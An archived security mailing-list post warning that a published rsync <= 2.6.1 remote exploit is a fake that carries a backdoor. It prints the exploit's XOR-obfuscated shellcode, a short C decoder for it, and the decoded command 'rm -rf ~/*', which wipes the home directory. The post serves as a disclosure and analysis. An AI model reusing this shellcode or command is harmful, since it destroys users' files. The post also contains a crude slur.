lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <BAY8-F52FHfLQV8xl8W00049755@hotmail.com> From: downbload at hotmail.com (DownBload / Illegal Instruction Labs) Subject: rsynd-too-open.c posted on fd is backdoored. Don't run it!!! rsync <= 2.6.1 remote exploit posted to full disclosure list is a fake and malicious exploit. Don't run it!!! rsynd-too-open.c: .... void (*funct) (); .... (long) funct = &shellcode2; .... funct(); .... "shellcode2" is a malicious asm code that will delete your home directory. Shellcode is encrypted with a simple XOR algorithm to obscure its main purpose. Whoever backdoored this exploit is 100% gaydiot (mix between gay and idiot :). I can understand people who backdoor exploits to hack machines, but placing backdoors that will delete user home dir is evil and plain stupid. [rot@...top BACKDOOR]# gcc back.c [root@...top BACKDOOR]# ./a.out è % / b i n / s h s h - c r m - r f ~ / * 2 > / d e v / n u l l back.c ---cut here--- char shellcode2[] = "\xeb\x10\x5e\x31\xc9\xb1\x4b\xb0\xff\x30\x06\xfe\xc8\x46\xe2\xf9" "\xeb\x05\xe8\xeb\xff\xff\xff\x17\xdb\xfd\xfc\xfb\xd5\x9b\x91\x99" "\xd9\x86\x9c\xf3\x81\x99\xf0\xc2\x8d\xed\x9e\x86\xca\xc4\x9a\x81" "\xc6\x9b\xcb\xc9\xc2\xd3\xde\xf0\xba\xb8\xaa\xf4\xb4\xac\xb4\xbb" "\xd6\x88\xe5\x13\x82\x5c\x8d\xc1\x9d\x40\x91\xc0\x99\x44\x95\xcf" "\x95\x4c\x2f\x4a\x23\xf0\x12\x0f\xb5\x70\x3c\x32\x79\x88\x78\xf7" "\x7b\x35"; main (int argc, char **argv) { char *decrypt = shellcode2+23, key=0xff; int x; for (x=0;x<0x29;x++) { printf ("%c ", *decrypt ^ key); decrypt++; key--; } } ---cut here--- _________________________________________________________________ Add photos to your e-mail with MSN 8. Get 2 months FREE*. http://join.msn.com/?page=features/featuredemail
Powered by blists - more mailing lists